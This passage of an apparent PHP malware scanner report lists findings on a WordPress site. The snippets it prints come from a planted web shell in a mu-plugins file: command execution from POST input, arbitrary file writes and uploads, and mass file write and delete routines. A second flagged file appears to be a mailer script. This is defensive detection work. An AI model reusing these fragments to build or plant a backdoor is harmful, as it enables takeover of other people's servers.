</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_192").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/mu-plugins/EAztoria99.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 20.04 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-06-16 13:17:04</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 27</span><br><table id="file_193" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">,</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'src'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">].</span><span style="color: #DD0000">' 2>&1'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$fowner </span><span style="color: #007700">= @</span><span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">fileowner</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/</span><span style="color: #0000BB">$file</span><span style="color: #DD0000">"</span><span style="color: #007700">)); </span><span style="color: #0000BB">$fowner </span><span style="color: #007700">= </span><span style="color: #0000BB">$fowner</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]; }else{ </span><span style="color: #0000BB">$fowner </span><span style="color: #007700">= </span><span style="color: #0000BB">fileowner</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/</span><span style="color: #0000BB">$file</span><span style="color: #DD0000">"</span><span style="color: #007700">); } if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$fgrp </span><span style="color: #007700">= @</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/</span><span style="color: #0000BB">$file</span><span style="color: #DD0000">"</span><span style="color: #007700">)); </span><span style="color: #0000BB">$fgrp </span><span style="color: #007700">= </span><span style="color: #0000BB">$fgrp</span><span style="color: #007700">[</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function:<</span><span style="color: #0000BB">div </span><span style="color: #007700">class=</span><span style="color: #DD0000">'table-responsive'</span><span style="color: #007700">></span><span style="color: #0000BB">$disfc</span><span style="color: #007700"></</span><span style="color: #0000BB">div</span><span style="color: #007700">></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 190</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mass_kabeh</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">,</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">,</span><span style="color: #0000BB">$isi_script</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mass_biasa</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">,</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">,</span><span style="color: #0000BB">$isi_script</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">▟</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">,</span><span style="color: #0000BB">$p</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hapus_massal</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">,</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<gr class='anu'>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$p</span><span style="color: #007700">.</span><span style="color: #DD0000">"</gr>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<rd class='anu'>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$p</span><span style="color: #007700">.</span><span style="color: #DD0000">"</rd>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">right</span><span style="color: #DD0000">'></i></button></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ok</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">er</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sz</span><span style="color: #007700">(</span><span style="color: #0000BB">$byt</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return(</span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$byt</span><span style="color: #007700">,</span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">" "</span><span style="color: #007700">.</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ip</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 536</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ipas</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">p</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$i</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"- ?? -"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getegid'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silenced_eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@eval(</span><span style="color: #DD0000">"phpinfo()</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">"phpinfo();"</span><span style="color: #007700">); </span><span style="color: #0000BB">$buff </span><span style="color: #007700">= @</span><span style="color: #0000BB">ob_get_contents</span><span style="color: #007700">(); @</span><span style="color: #0000BB">ob_end_clean</span><span style="color: #007700">(); </span><span style="color: #0000BB">$awal </span><span style="color: #007700">= </span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$buff</span><span style="color: #007700">,</span><span style="color: #DD0000">"<body>"</span><span style="color: #007700">)+</span><span style="color: #0000BB">6</span><span style="color: #007700">; </span><span style="color: #0000BB">$akhir </span><span style="color: #007700">= </span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$buff</span><span style="color: #007700">,</span><span style="color: #DD0000">"</body>"</span><span style="color: #007700">); echo </span><span style="color: #DD0000">"<b><pre class='php_info anu'>"</span><span style="color: #007700">.</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$buff</span><span style="color: #007700">,</span><span style="color: #0000BB">$awal</span><span style="color: #007700">,</span><span style="color: #0000BB">$akhir</span><span style="color: #007700">-</span><span style="color: #0000BB">$awal</span><span style="color: #007700">).</span><span style="color: #DD0000">"</pre></b>"</span><span style="color: #007700">; exit; } if(isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'upload'</span><span style="color: #007700">])) { echo </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$_s</span><span style="color: #DD0000">"</span><span style="color: #007700">; if(isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'upl'</span><span style="color: #007700">])){ </span><span style="color: #0000BB">$hasil </span><span style="color: #007700">= </span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]); for(</span><span style="color: #0000BB">$isi</span><span style="color: #007700">=</span><span style="color: #0000BB">0</span><span style="color: #007700">;</span><span style="color: #0000BB">$isi</span><span style="color: #007700"><</span><span style="color: #0000BB">$hasil</span><span style="color: #007700">;</span><span style="color: #0000BB">$isi</span><span style="color: #007700">++){ </span><span style="color: #0000BB">$namafile </span><span style="color: #007700">= </span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">][</span><span style="color: #0000BB">$isi</span><span style="color: #007700">]; </span><span style="color: #0000BB">$up </span><span style="color: #007700">= @</span><span style="color: #0000BB">copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'tmp_name'</span><span style="color: #007700">][</span><span style="color: #0000BB">$isi</span><span style="color: #007700">],</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/"</span><span style="color: #007700">.</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">); } if(</span><span style="color: #0000BB">$hasil </span><span style="color: #007700">< </span><span style="color: #0000BB">2</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">$up</span><span style="color: #007700">)...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">()); </span><span style="color: #0000BB">$gid </span><span style="color: #007700">= @</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_getegid</span><span style="color: #007700">()); </span><span style="color: #0000BB">$user </span><span style="color: #007700">= </span><span style="color: #0000BB">$uid</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]; </span><span style="color: #0000BB">$uid </span><span style="color: #007700">= </span><span style="color: #0000BB">$uid</span><span style="color: #007700">[</span><span style="color: #DD0000">'uid'</span><span style="color: #007700">]; </span><span style="color: #0000BB">$group </span><span style="color: #007700">= </span><span style="color: #0000BB">$gid</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]; </span><span style="color: #0000BB">$gid </span><span style="color: #007700">= </span><span style="color: #0000BB">$gid</span><span style="color: #007700">[</span><span style="color: #DD0000">'gid'</span><span style="color: #007700">]; } </span><span style="color: #0000BB">$sm </span><span style="color: #007700">= (@</span><span style="color: #0000BB">ini_get</span><span style="color: #007700">(</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #DD0000">"safe_mode"</span><span style="color: #007700">)) == </span><span style="color: #DD0000">'on'</span><span style="color: #007700">) ? </span><span style="color: #DD0000">"<rd>ON</rd>" </span><span style="color: #007700">: </span><span style="color: #DD0000">"<gr>OFF</gr>"</span><span style="color: #007700">; echo </span><span style="color: #DD0000">"<br /><!DOCTYPE HTML><br /><html><br /> <head><br /> <meta name='author' content='</span><span style="color: #0000BB">$_n</span><span style="color: #DD0000">'><br /> <meta name='robots' content='noindex,nofollow'><br /> <title>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'HTTP_HOST'</span><span style="color: #007700">].</span><span style="color: #DD0000">" - </span><span style="color: #0000BB">$_n</span><span style="color: #DD0000"></title><br /> <meta name='viewport' content='width=device-width, initial-scale=0.70'><br /> <link...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">].</span><span style="color: #DD0000">' 2>&1'</span><span style="color: #007700">); } echo </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$_s</span><span style="color: #DD0000"><br /><div class='mb-3'><br /> <form method='POST'><br /> <div class='input-group mb-3'><br /> <input class='form-control btn-sm' type='text' name='cmd' value='"</span><span style="color: #007700">.</span><span style="color: #0000BB">htmlspecialchars</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">], </span><span style="color: #0000BB">ENT_QUOTES</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">).</span><span style="color: #DD0000">"' placeholder='whoami' </span><span style="color: #0000BB">$_r</span><span style="color: #DD0000">><br /> <button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button><br /> </div><br /> </form>"</span><span style="color: #007700">; if(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">): echo </span><span style="color: #DD0000">'<br /> <div class="container-fluid language-javascript"><br /> <div class="shell mb-3"><br />...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_193").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/xArNgesC91T.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_194" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
